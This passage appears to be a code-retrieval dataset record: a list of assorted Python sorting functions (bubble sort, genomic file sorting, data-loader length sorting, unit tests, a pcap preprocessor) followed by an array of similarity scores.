0:\n\t\tarrayIndex = 0\n\t\twhile arrayIndex < arrayLen - 1:\n\t\t\tthisVal = dataset[arrayIndex]\n\t\t\tnextVal = dataset[arrayIndex + 1]\n\t\t\tif thisVal > nextVal:\n\t\t\t\tdataset[arrayIndex + 1] = thisVal\n\t\t\t\tdataset[arrayIndex] = nextVal\n\t\t\tarrayIndex += 1\n\t\tprint \"Current State:\", dataset\n\t\tbubbleIndex -= 1", "def sort_all(batch, lens):\r\n unsorted_all = [lens] + [range(len(lens))] + list(batch)\r\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\r\n return sorted_all[2:], sorted_all[1]", "def sort_bam(inbamfile,\n outbamfile,\n sort_order=\"coordinate\"):\n\n cmd_sort = \"java -Xmx6g -jar $NGS_PICARD/SortSam.jar \" \\\n \"INPUT=%s \" \\\n \"OUTPUT=%s \" \\\n \"SORT_ORDER=%s\" % (inbamfile,\n outbamfile,\n sort_order)\n return cmd_sort", "def sortData(unsortedList):\r\n # We will begin with the data from the bubble sort\r\n bubbleSortData = []\r\n bubbleSortOptData = []\r\n selectionSortData = []\r\n insertionSortData = []\r\n\r\n # The range of testing will begin at zero\r\n testRange = 0\r\n\r\n for i in range(len(unsortedList) + 1):\r\n bubbleSortCount = Sorts.bubbleSort(unsortedList[:testRange])\r\n bubbleSortData.append(bubbleSortCount)\r\n\r\n bubbleSortOptCount = Sorts.bubbleSortOpt(unsortedList[:testRange])\r\n bubbleSortOptData.append(bubbleSortOptCount)\r\n\r\n selectionSortCount = Sorts.selectionSort(unsortedList[:testRange])\r\n selectionSortData.append(selectionSortCount)\r\n\r\n insertionSortCount = Sorts.insertionSort(unsortedList[:testRange])\r\n insertionSortData.append(insertionSortCount)\r\n testRange += 1\r\n\r\n # Write the sort data to text file\r\n writeSortDataToText(bubbleSortData, bubbleSortOptData, selectionSortData, insertionSortData)", "def __init__(self, data, draw, speed):\n self.heap_sort(data, draw, speed)", "def _sort(self):\n self.population.sort()\n self.population.reverse()", "def sort(self, desc):\n self.__sortByIndex(0, desc)", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 
'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def tweet_sort(twitter_data, results, cmp):\n\n # Insertion sort\n for i in range(1, len(results)):\n current = results[i]\n position = i\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\n results[position] = results[position - 1]\n position = position - 1\n results[position] = current", "def test_benchmark_xsorted(partition_size, benchmark, benchmark_items_fixture):\n xsorted_ = xsorter(partition_size=partition_size)\n do_benchmark(benchmark_items_fixture, xsorted_, benchmark)", "def sort(self,desc):\n\tself.__sort(\"\",\"\",desc)", "def sort(self, key_func):\n pass", "def sort_list(self,list_):\r\n list_.sort()", "def test_list_flow_classifier_sort(self):\n resources = \"flow_classifiers\"\n cmd = fc.FlowClassifierList(test_cli20.MyApp(sys.stdout), None)\n self._test_list_resources(resources, cmd,\n sort_key=[\"name\", \"id\"],\n sort_dir=[\"asc\", \"desc\"])", "def sort_inventory(self, inventory_list): # dont use transactions here...as it is called within other transactions\n # unused will be deprecated\n batch_list = []\n new_inventory_list = []\n try:\n for i in inventory_list:\n if i.batch_number:\n batch_list.append(i.batch_number)\n batch_list.sort()\n for i in batch_list:\n for j in inventory_list:\n if j.batch_number == i:\n new_inventory_list.append(j)\n return new_inventory_list\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return new_inventory_list", "def sort_entries(entries: List[CapTableEntry], order_by: str, order_direction: str):\n if order_by == \"balance\":\n key = lambda entry: entry.balance\n elif order_by == \"name\":\n key = lambda entry: entry.name\n elif order_by == \"updated\":\n key = lambda entry: entry.updated_at\n elif order_by == \"address\":\n key = lambda entry: entry.address\n else:\n raise TypeError(\"Unknown sort order\")\n\n if order_direction == \"asc\":\n entries.sort(key=key)\n elif order_direction == \"desc\":\n entries.sort(key=key, reverse=True)\n else:\n raise TypeError(\"Unknown sort direction\")", "def sort(match, ser_if):\n if match:\n ser_if.write('m')\n else:\n ser_if.write('c')\n return check_response(ser_if)", "def sort(self, quant=None):\n if quant is None: # sort bei weight\n self.__sortlist = [key for key, values in sorted(self.__quantile.items(), key=lambda items: sum((10^quantille * count for quantille, count in enumerate(items[1].values()))))]\n elif isinstance(quant, int):\n self.__sortlist = [key for key, values in sorted(self.__quantile.items(), key=lambda items: items[1][quant])]", "def 
test_for_different_input_sizes_desc(self):\n for size in range(1, 50):\n c = [random.randint(1, 1000) for _ in range(size)]\n\n copy = c\n\n # sort using mergeSort and using builtin sort\n sort.desc(c)\n copy.sort(reverse=True)\n\n assert c == copy", "def sort_by_length(self):\n target_lengths = list()\n\n for idx, label_path in enumerate(self.label_paths):\n key = label_path.split('/')[-1].split('.')[0]\n target_lengths.append(len(self.target_dict[key].split()))\n\n bundle = list(zip(target_lengths, self.audio_paths, self.label_paths, self.augment_flags))\n _, self.audio_paths, self.label_paths, self.augment_flags = zip(*sorted(bundle, reverse=True))\n\n del _", "def sort_collected_data():\n\n def is_from_valid_set(fn):\n return fn.find(\"validation\") != -1\n\n source_dir = \"data\"\n\n x_train_dir = os.path.join(SEG_DATA_FOLDER, \"train\")\n y_train_dir = os.path.join(SEG_DATA_FOLDER, \"train_label\")\n x_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val\")\n y_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val_label\")\n\n for direc in [x_train_dir, y_train_dir, x_valid_dir, y_valid_dir]:\n mkdir_if_not_exist(direc)\n\n images = [x for x in os.listdir(source_dir) if x.find(\"png\") >= 0]\n inputs = [x for x in images if x.find(\"label\") == -1]\n labels = [x for x in images if x.find(\"label\") != -1]\n\n train_x = [x for x in inputs if not is_from_valid_set(x)]\n valid_x = [x for x in inputs if is_from_valid_set(x)]\n train_y = [x for x in labels if not is_from_valid_set(x)]\n valid_y = [x for x in labels if is_from_valid_set(x)]\n\n for f in train_x:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_train_dir, f))\n\n for f in train_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_train_dir, f))\n\n for f in valid_x:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_valid_dir, f))\n\n for f in valid_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_valid_dir, f))", "def _sort_phot(self, verbose=False):\n if hasattr(self, \"data\") and hasattr(self, \"data_filters\"):\n ## This looks fugly.\n newkeys = np.array([i for i in self.data_filters.keys()])[np.argsort([self.data_filters[i].lambda_effective.value for i in self.data_filters])]\n\n sorted_data = OrderedDict()\n sorted_data_filters = OrderedDict()\n\n for newkey in newkeys:\n\n if verbose: print(newkey)\n\n sorted_data[newkey] = self.data[newkey]\n sorted_data_filters[newkey] = self.data_filters[newkey]\n\n self.data = sorted_data\n self.data_filters = sorted_data_filters\n\n else:\n warnings.warn(\"Doesn't seem to be any data here (empty self.data)\")\n pass", "def sorted_models(cls, model_dir, sort:str = 'step', desc:bool = True) -> List[Path]:\n paths = model_dir.glob('model_*.pkl')\n sorters = {\n 'test_score': cls._path_to_test_score,\n 'total_score': cls._path_to_total_score,\n 'step': cls._path_to_step_no\n }\n if sort not in sorters:\n raise Exception(f'Sort {sort} not supported. 
valid options: {sorters.keys()}')\n return sorted(paths, key=sorters[sort], reverse=desc)", "def sort(self, key: str):\n return self._select_interface(self._rc_sort, self._http_sort, key)", "def sort(self, *args, **kwargs):\n self._sequence.sort(*args, **kwargs)", "def sorting_urls(train_imgs, test_imgs, val_imgs):\n\n # Get the bad urls\n bad_urls = get_bad_urls()\n # Get Dev data-set\n dev_imgs = get_dev_entities_img_ids()\n\n real_train_imgs = []\n real_test_imgs = []\n real_val_imgs = []\n\n # Remove bad urls\n for img in train_imgs:\n if img.url in bad_urls:\n continue\n\n img_id = img.url.split(\"/\")[-1]\n img_id = int(img_id.split('.')[0])\n if img_id in dev_imgs and USE_DEV:\n continue\n real_train_imgs.append(img)\n\n for img in test_imgs:\n if img.url in bad_urls:\n continue\n\n img_id = img.url.split(\"/\")[-1]\n img_id = int(img_id.split('.')[0])\n if img_id in dev_imgs and USE_DEV:\n continue\n real_test_imgs.append(img)\n\n for img in val_imgs:\n if img.url in bad_urls:\n continue\n\n img_id = img.url.split(\"/\")[-1]\n img_id = int(img_id.split('.')[0])\n if img_id in dev_imgs and USE_DEV:\n continue\n real_val_imgs.append(img)\n\n logger.log(\"Debug printing after sorting- the number of train samples: {0}, the number of test samples: {1}, \"\n \"the number of validation samples: {2}\".format(len(real_train_imgs),\n len(real_test_imgs),\n len(real_val_imgs)))\n return real_train_imgs, real_test_imgs, real_val_imgs", "def test_sorting(sort=selection_sort, num_items=20, max_value=50):\n # TODO: Repeat until all items are in sorted order\n # TODO: Take first unsorted item\n # TODO: Insert it in sorted order in front of items", "def _sort_by_name(bam_fn):", "def test_pyt_batchsort_train(self):\n # Next, check that training works\n dt_and_preprocess = [\n ('train', False),\n ('train:stream', False),\n ('train', True)\n ]\n for dt, preprocess in dt_and_preprocess:\n defaults = parser_defaults.copy()\n defaults['datatype'] = dt\n defaults['pytorch_preprocess'] = preprocess\n defaults['pytorch_teacher_batch_sort'] = True\n defaults['batchsize'] = 32\n if preprocess:\n defaults['batch_sort_field'] = 'text_vec'\n str_output, _, _ = testing_utils.train_model(defaults)\n self.assertTrue(\n solved_task(str_output),\n 'Teacher could not teach seq2seq with batch sort '\n 'and args {} and output {}'\n .format((dt, preprocess), str_output)\n )", "def sort_results(self):\n pass", "def sort():\n return -1", "def _sort_by_duration(self) -> None:\n total_samples = len(self.paths)\n if total_samples == 0:\n return\n samples = zip(self.paths, self.durations, self.transcriptions)\n sorted_samples = sorted(samples, key=lambda sample: sample[1])\n self.paths, self.durations, self.transcriptions = [\n list(c) for c in zip(*sorted_samples)\n ]\n assert (\n total_samples\n == len(self.paths)\n == len(self.durations)\n == len(self.transcriptions)\n ), \"_sort_by_duration len mis-match\"", "def reversesort(self):\n ...", "def sort(self, *args, **kwargs) -> \"Actions\":\n self.actions.sort(*args, **kwargs)\n return self", "def sort_data(self):\n\n # zips the game_list and game_Scores, sorts the result by scores, and then puts them back.\n self.game_list, self.game_scores = zip(*sorted(zip(self.game_list, self.game_scores), key=lambda pair: pair[1]))", "def sort(*, list : Union[List[Any], ConduitVariable], reverse : bool = False) -> None:\n list.sort(key = None, reverse = reverse)", "def python_sort(a_list):\n \n start_time = time.time()\n\n a_list.sort()\n\n end_time = time.time()\n\n run_time = end_time 
- start_time\n\n return (run_time, a_list)", "def sort(self,cmp_iter_able,reverse = False):\n length = len(cmp_iter_able)\n h=1\n while h < length/3:\n h = 3*h + 1\n \n while h >= 1 :\n for i in range(h,length):\n j = i\n while j > 0:\n if self.compare(cmp_iter_able[j],cmp_iter_able[j-h],reverse = reverse):\n self.exch(cmp_iter_able,j,j-h)\n j -=h\n h = int(h/3)", "def test_sort_outputs_0a6a357e(self):\n outputs = bip69.get_outputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_outputs = bip69.sort_outputs(outputs)\n self.assertEqual(bip69_outputs[0], (('76a9144a5fba237213a062f6f57978f79'\n '6390bdcf8d01588ac'), 400057456))\n self.assertEqual(bip69_outputs[1], (('76a9145be32612930b8323add2212a4ec'\n '03c1562084f8488ac'), 40000000000))", "def sort(self, *args, **kargs):\n list.sort(self, *args, **kargs)\n self.emit('modified')", "def sortSample(self, key, ascending):\n try:\n self.sample[self.sample['masked'] == False].sort_values(by=key, ascending=ascending)\n except:\n pass", "def sort_probs(probs_list):\n return sorted(probs_list, key=lambda x: x[1])", "def sort(self, sort):\n\n self._sort = sort", "def sortByRecordNum(self, records, verbose=False, in_place=False):\n tmp = records # copy of records for sorting\n if (verbose):\n print \"[EVT] Sorting by record number\"\n\n swapped = True\n while swapped:\n swapped = False\n for i in xrange(len(tmp)-1):\n ni = tmp[i].getField(\"recordNumber\")\n nj = tmp[i+1].getField(\"recordNumber\")\n if ni > nj:\n t = tmp[i+1]\n tmp[i+1] = tmp[i]\n tmp[i] = t\n swapped = True\n return tmp", "def sortByTimeGenerated(self, records, verbose=False, in_place=False):\n tmp = records\n if (verbose):\n print \"[EVT] Sorting by time generated\"\n\n swapped = True\n while swapped:\n swapped = False\n for i in xrange(len(tmp)-1):\n ni = tmp[i].getField(\"timeGenerated\")\n nj = tmp[i+1].getField(\"timeGenerated\")\n if ni > nj:\n t = tmp[i+1]\n tmp[i+1] = tmp[i]\n tmp[i] = t\n swapped = True\n return tmp", "def sort(self, key: Callable):\n self.data.sort(key=key)", "def sort(self, key: Callable):\n self.data.sort(key=key)", "def sort_1(l):\n pass", "def sort_results(self, sort_option):\r\n self.model.sort_data(sort_option)", "def tensor_resort(inputs, tensor_order):\n pass", "def categorize_data(data, top_count):\n sorted_by_tcp = sorted(\n data, key=lambda x: x['TCP Utilization'], reverse=True\n )[0:top_count]\n sorted_by_udp = sorted(\n data, key=lambda x: x['UDP Utilization'], reverse=True\n )[0:top_count]\n\n print(f\"\\nTOP-{top_count} port flooders by TCP\")\n print(tabulate(sorted_by_tcp, headers='keys', tablefmt=\"psql\"))\n print(f\"\\nTOP-{top_count} port flooders by UDP\")\n print(tabulate(sorted_by_udp, headers='keys', tablefmt=\"psql\"))", "def sorting_alg(self, my_list):\n for i in range(len(my_list)):\n for j in range(i+1, len(my_list)):\n if my_list[i] > my_list[j]:\n my_list[i], my_list[j] = my_list[j], my_list[i]\n #print(my_list)\n #sleep(1)\n return my_list", "def bboxes_sort(classes, scores, bboxes, top_k = 400):\n# if priority_inside:\n# inside = (bboxes[:, 0] > margin) & (bboxes[:, 1] > margin) & \\\n# (bboxes[:, 2] < 1-margin) & (bboxes[:, 3] < 1-margin)\n# idxes = np.argsort(-scores)\n# inside = inside[idxes]\n# idxes = np.concatenate([idxes[inside], idxes[~inside]])\n idxes = np.argsort(-scores)\n classes = classes[idxes][:top_k]\n scores = scores[idxes][:top_k]\n bboxes = bboxes[idxes][:top_k]\n return classes, scores, bboxes", "def sort_unit_lst(self, attrname, lst2sort):\n comp = []\n for unit in lst2sort:\n importance = 
self._importance_rank(unit, attrname)\n comp.append((unit, importance))\n comp = sorted(comp, key= lambda x: x[1], reverse=True)\n\n return [x[0] for x in comp]", "def sort(self):\r\n\t\tif ScoreOpt.isGroupVassals():\r\n\t\t\tself._playerScores.sort(lambda x, y: cmp(x.sortKey(), y.sortKey()))\r\n\t\t\tself._playerScores.reverse()\r\n\t\tmaxPlayers = ScoreOpt.getMaxPlayers()\r\n\t\tif maxPlayers > 0 and len(self._playerScores) > maxPlayers:\r\n\t\t\tself._playerScores = self._playerScores[len(self._playerScores) - maxPlayers:]", "def sort(unsorted_bed_file_name, sorted_bed_file_name):\n array_call = ['sort', '-k', '1,1', '-k', '2,2n',\n unsorted_bed_file_name, '-o', sorted_bed_file_name]\n p = _handleExceptionAndCheckCall(array_call)\n return p", "def sort_bed_dir(input_beddir,output_beddir):\n print(\"processing .. sorting bed files \",input_beddir)\n if not os.path.exists(input_beddir):\n raise(\"input directory does not exist\")\n if not os.path.exists(output_beddir):\n os.makedirs(output_beddir)\n\n cmd = [\"bedtools\", \"sort\", \"-i\", \"${FILENAME}.bed\"]\n for file in glob.glob(os.path.join(input_beddir, '*bed')):\n file_name = os.path.basename(file).split('.')[0]\n output_filename = os.path.join(output_beddir, file_name+\"_sort.bed\")\n bedtool_obj = pybedtools.BedTool(file)\n bedtool_obj.sort().saveas(output_filename)\n # cmd[-1] = file\n # with open(output_filename, \"w\") as file:\n # subprocess.run(cmd, check=True, stdout=file)", "def ps_list(self,sort_by='cpu',**filters):\n import operator\n import numpy.distutils.proc as numpy_proc\n res = self.apply(numpy_proc.ps_list,())\n psl = reduce(operator.add,res)\n psl = numpy_proc.ps_sort(psl,sort_by,**filters)\n return psl", "def main(args):\n\tunsorted_array = []\n\n\tif args.order == 'ASC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\n\tif args.order == 'DESC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tunsorted_array = list(reversed(unsorted_array))\n\n\tif args.order == 'RAND':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tnp.random.shuffle(unsorted_array)\n\n\tsize = int(args.instancesize)\n\n\tif args.algorithm == 'all':\n\t\tselection_sort(unsorted_array, size)\n\t\tinsertion_sort(unsorted_array, size)\n\t\tshell_sort(unsorted_array, size)\n\t\tmerge_sort(unsorted_array, size)\n\t\theap_sort(unsorted_array, size)\n\t\tquick_sort(unsorted_array, size)\n\n\tif args.algorithm == 'selection':\n\t\tselection_sort(unsorted_array, size)\n\n\tif args.algorithm == 'insertion':\n\t\tinsertion_sort(unsorted_array, size)\n\n\tif args.algorithm == 'shell':\n\t\tshell_sort(unsorted_array, size)\n\n\tif args.algorithm == 'merge':\n\t\tmerge_sort(unsorted_array, size)\n\n\tif args.algorithm == 'heap':\n\t\theap_sort(unsorted_array, size)\n\n\tif args.algorithm == 'quick':\n\t\tquick_sort(unsorted_array, size)" ]
[ "0.55296206", "0.5489133", "0.5482073", "0.5391432", "0.53850245", "0.53489995", "0.5328854", "0.52847326", "0.5241572", "0.5189761", "0.5177634", "0.51613575", "0.51465315", "0.5137804", "0.5135673", "0.51097757", "0.51089555", "0.51009786", "0.5096934", "0.5095022", "0.5090213", "0.50829244", "0.50816697", "0.50816697", "0.5043453", "0.5042157", "0.5031161", "0.5017638", "0.49982575", "0.49934813", "0.49918067", "0.49906412", "0.4975226", "0.49486214", "0.49420223", "0.4940597", "0.49337935", "0.49175647", "0.49048865", "0.48996064", "0.4881592", "0.4879902", "0.4872204", "0.48709634", "0.4858807", "0.48569602", "0.48529425", "0.48529005", "0.48423338", "0.48400155", "0.4835978", "0.48350015", "0.48333716", "0.48305142", "0.4826351", "0.4816019", "0.48151052", "0.47837818", "0.47785738", "0.47670168", "0.47599232", "0.47595018", "0.47571123", "0.4754714", "0.47489417", "0.47413918", "0.4738749", "0.47360376", "0.47247815", "0.4722445", "0.47196788", "0.47187704", "0.47185072", "0.47157642", "0.47150943", "0.47125316", "0.47060183", "0.4697381", "0.46900454", "0.46861556", "0.46847007", "0.46796644", "0.46770075", "0.46702155", "0.46663293", "0.46544906", "0.4652947", "0.4652947", "0.46462625", "0.4641998", "0.46417567", "0.46376893", "0.46327725", "0.4629401", "0.46287772", "0.46272144", "0.4624132", "0.46230587", "0.4620519", "0.46168977" ]
0.7660257
0
test that the StrainData.fetch_open_frame works as expected
def test_fetch_open_frame(self): import requests pesummary_data = StrainData.fetch_open_frame( "GW190412", IFO="L1", duration=32, sampling_rate=4096., channel="L1:GWOSC-4KHZ_R1_STRAIN", format="hdf5" ) N = len(pesummary_data) np.testing.assert_almost_equal(N * pesummary_data.dt.value, 32.) np.testing.assert_almost_equal(1. / pesummary_data.dt.value, 4096.) assert pesummary_data.IFO == "L1" _data = requests.get( "https://www.gw-openscience.org/eventapi/html/GWTC-2/GW190412/v3/" "L-L1_GWOSC_4KHZ_R1-1239082247-32.gwf" ) with open("L-L1_GWOSC_4KHZ_R1-1239082247-32.gwf", "wb") as f: f.write(_data.content) data2 = TimeSeries.read( "L-L1_GWOSC_4KHZ_R1-1239082247-32.gwf", channel="L1:GWOSC-4KHZ_R1_STRAIN" ) np.testing.assert_almost_equal(pesummary_data.value, data2.value) np.testing.assert_almost_equal( pesummary_data.times.value, data2.times.value )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_fetch_open_data(self):\n args = [\"L1\", 1126259446, 1126259478]\n pesummary_data = StrainData.fetch_open_data(*args)\n gwpy_data = TimeSeries.fetch_open_data(*args)\n np.testing.assert_almost_equal(pesummary_data.value, gwpy_data.value)\n np.testing.assert_almost_equal(\n pesummary_data.times.value, gwpy_data.times.value\n )\n assert isinstance(pesummary_data.gwpy, TimeSeries)\n np.testing.assert_almost_equal(\n pesummary_data.gwpy.value, gwpy_data.value\n )\n np.testing.assert_almost_equal(\n pesummary_data.gwpy.times.value, gwpy_data.times.value\n )\n assert pesummary_data.IFO == \"L1\"\n assert list(pesummary_data.strain_dict.keys()) == [\"L1\"]\n np.testing.assert_almost_equal(\n pesummary_data.strain_dict[\"L1\"].value, gwpy_data.value\n )\n np.testing.assert_almost_equal(\n pesummary_data.strain_dict[\"L1\"].times.value, gwpy_data.times.value\n )", "def test_dataframe(self):\n\n url=\"http://archive.ics.uci.edu/ml/machine-learning-databases/wine/wine.data\"\n readerobject=requester.url_to_df(url)\n self.assertIsInstance(readerobject,pd.DataFrame)", "def test_fetch_traffic(self):\n assert isinstance(_tabular.fetch_traffic_data(), \n pd.DataFrame)", "def test_fetch_crime_sedf(self):\n assert isinstance(_vector.fetch_beach_access_data(f='arcgis'), \n pd.DataFrame)", "def test_get_df(mocker):\n spy_load_metadata = mocker.spy(MetaData, 'load_document')\n expected_df = pd.read_json('tests/odata/fixtures/records.json', orient='records')\n\n provider = ODataConnector(\n name='test',\n baseroute='http://services.odata.org/V4/Northwind/Northwind.svc/',\n auth={'type': 'basic', 'args': ['u', 'p']},\n )\n\n data_source = ODataDataSource(\n domain='test',\n name='test',\n entity='Orders',\n query={\n '$filter': \"ShipCountry eq 'France'\",\n '$orderby': 'Freight desc',\n '$skip': 50,\n '$top': 3,\n },\n )\n\n try:\n df = provider.get_df(data_source)\n sl = ['CustomerID', 'EmployeeID', 'Freight']\n assert df[sl].equals(expected_df[sl])\n except socket.error:\n pytest.skip('Could not connect to the standard example OData service.')\n\n assert spy_load_metadata.call_count == 1\n args, _ = spy_load_metadata.call_args\n assert args[0].url.endswith('/$metadata')\n\n provider.auth = None\n try:\n provider.get_df(data_source)\n except socket.error:\n pytest.skip('Could not connect to the standard example OData service.')", "def test_readSongData():\n\n # check type\n assert isinstance(song_df, pd.DataFrame)\n\n # check shape\n assert song_df.shape == (1972060, 8)", "def test_sector_perfomance_pandas_python2(self, mock_urlopen):\n sp = SectorPerformances(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def supports_fetch_outside_dataloader(self):\r\n return True", "def test_fetch_crime(self):\n assert isinstance(_tabular.fetch_crime_data(), \n pd.DataFrame)", "def test_sector_perfomance_pandas_python3(self, mock_urlopen):\n sp = SectorPerformances(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def 
test_open_fill(self):", "def testCircuitFetch(self):\n\n timeCol = 'timestamp'\n rows = []\n for row in self.aggregator.rawData(dataType = 'circuit',\n orderBy = [timeCol, 'circuit'],\n timestampCol = timeCol,\n startDate = self.testStart,\n endDate = self.testEnd):\n rows.append(row)\n self.assertIsNotNone(rows, 'Rows are present.')", "def test_stream_to_data_frame():\n # -- Setup - Create archive in main memory --------------------------------\n archive = Archive()\n for df in [DF1, DF2, DF3]:\n doc = DataFrameDocument(df=df)\n archive.commit(doc)\n # -- Read dataframes for first two snapshots ------------------------------\n #\n # The snapshots are only identical if the data frames where sorted by the\n # data frame index. Thus, the third snapshot will return a data frame in\n # different order.\n pd.testing.assert_frame_equal(archive.open(version=0).to_df(), DF1)\n pd.testing.assert_frame_equal(archive.open(version=1).to_df(), DF2)", "def test_readSongData():\n\n # make sure the number of columns pull out from the database is correct\n assert svd.song_df.shape[1] == 8", "def test_get_frame(mock_source):\n frame_ingestor = FrameIngestor(mock_source)\n frame_ingestor.get_frame()\n\n mock_source.get_frame.assert_called_once()", "def test_create_dataframe(chosen_columns, chosen_url):\n print(\"reading in data\")\n chosen_df = readindata(chosen_columns, chosen_url)\n print(\"checking columns\")\n checkcolumnstest(chosen_columns, chosen_df)\n print(\"checking types\")\n checktypestest(chosen_df)\n print(\"checking for Nan\")\n checkfornan(chosen_df)\n print(\"checking 1 row\")\n checkrowstest(chosen_df)\n return True", "async def test_fetch_filtered_dataset_call(self):\n pool = asynctest.CoroutineMock()\n db_response = {\"referenceBases\": '', \"alternateBases\": '', \"variantType\": \"\",\n \"referenceName\": 'Chr38',\n \"frequency\": 0, \"callCount\": 0, \"sampleCount\": 0, \"variantCount\": 0,\n \"start\": 0, \"end\": 0, \"accessType\": \"PUBLIC\", \"datasetId\": \"test\"}\n pool.acquire().__aenter__.return_value = Connection(accessData=[db_response])\n assembly_id = 'GRCh38'\n position = (10, 20, None, None, None, None)\n chromosome = 1\n reference = 'A'\n alternate = ('DUP', None)\n result = await fetch_filtered_dataset(pool, assembly_id, position, chromosome, reference, alternate, None, None, False)\n # for now it can return empty dataset\n # in order to get a response we will have to mock it\n # in Connection() class\n expected = {'referenceName': 'Chr38', 'callCount': 0, 'sampleCount': 0, 'variantCount': 0, 'datasetId': 'test',\n 'referenceBases': '', 'alternateBases': '', 'variantType': '', 'start': 0, 'end': 0, 'frequency': 0,\n 'info': {'accessType': 'PUBLIC'},\n 'datasetHandover': [{'handoverType': {'id': 'CUSTOM', 'label': 'Variants'},\n 'description': 'browse the variants matched by the query',\n 'url': 'https://examplebrowser.org/dataset/test/browser/variant/Chr38-1--'},\n {'handoverType': {'id': 'CUSTOM', 'label': 'Region'},\n 'description': 'browse data of the region matched by the query',\n 'url': 'https://examplebrowser.org/dataset/test/browser/region/Chr38-1-1'},\n {'handoverType': {'id': 'CUSTOM', 'label': 'Data'},\n 'description': 'retrieve information of the datasets',\n 'url': 'https://examplebrowser.org/dataset/test/browser'}]}\n\n self.assertEqual(result, [expected])", "def test_fetch_dataset(self):\n\n mock_pandas = MagicMock()\n mock_pandas.read_csv.return_value = sentinel.dataset\n\n result = Network.fetch_dataset(sentinel.url, pandas_impl=mock_pandas)\n\n 
self.assertEqual(result, sentinel.dataset)\n mock_pandas.read_csv.assert_called_once_with(sentinel.url, dtype=str)", "def test_frame_to_rows(self):\n pass", "def check_new_df(df):\n try:\n new_df = pull_modus()\n\n if assert_frame_equal(df, new_df):\n pass\n else:\n df = new_df.copy()\n\n return df\n \n except:\n pass # 'Modus URL not reachable'", "def test_fetch_metadata_for_dataset(self):\n\n with patch.object(pd, \"read_csv\") as func:\n func.return_value = pd.DataFrame(\n {\"Archive Link\": [\"test2\", \"test1\", \"test3\"],\n \"Update Date\": [\"2020/1/2\", \"2020/1/1\", \"2020/1/3\"]}\n )\n result = Network.fetch_metadata_for_dataset(\"test\")\n pd.testing.assert_frame_equal(\n result,\n pd.DataFrame(\n {\"Archive Link\": [\"test1\", \"test2\", \"test3\"],\n \"Update Date\": pd.date_range(\"2020/1/1\", \"2020/1/3\")}\n ).set_index(\"Update Date\")\n )\n func.assert_called_once_with(\n \"https://healthdata.gov/api/views/test/rows.csv\",\n dtype=str\n )", "def test_get_frame_no_source():\n frame_ingestor = FrameIngestor()\n with pytest.raises(RuntimeError):\n frame_ingestor.get_frame()", "def test_build_dataframe(self):\n insert_good_data()\n dataframe = get_dataframe()\n # 1 2 3\n self.assertIs(type(dataframe['Total'][0]), numpy.float64)\n self.assertIs(type(dataframe['InvoiceDate'][0]), str)\n self.assertIs(type(dataframe['Count'][0]), numpy.int64)\n # 4\n self.assertEqual(dataframe['Total'][0], 8198.79)\n # 5\n self.assertDataframeEqual(dataframe, get_equal_dataframe())\n alt_dataframe = get_alter_dataframe(self.database_connection)\n # 6\n self.assertNotEqual(alt_dataframe['Count'][0], dataframe['Count'][0])\n # 7\n with self.assertRaises(AssertionError):\n self.assertDataframeEqual(alt_dataframe, dataframe)\n # 8\n self.assertEqual(dataframe['Total'][0], alt_dataframe['Total'][0])", "def test_spotdb_reader(spotdb_data):\n\n db = spotdb_data\n\n reader = SpotDBReader(db)\n gfs = reader.read()\n\n assert len(gfs) == 4\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n assert metrics < 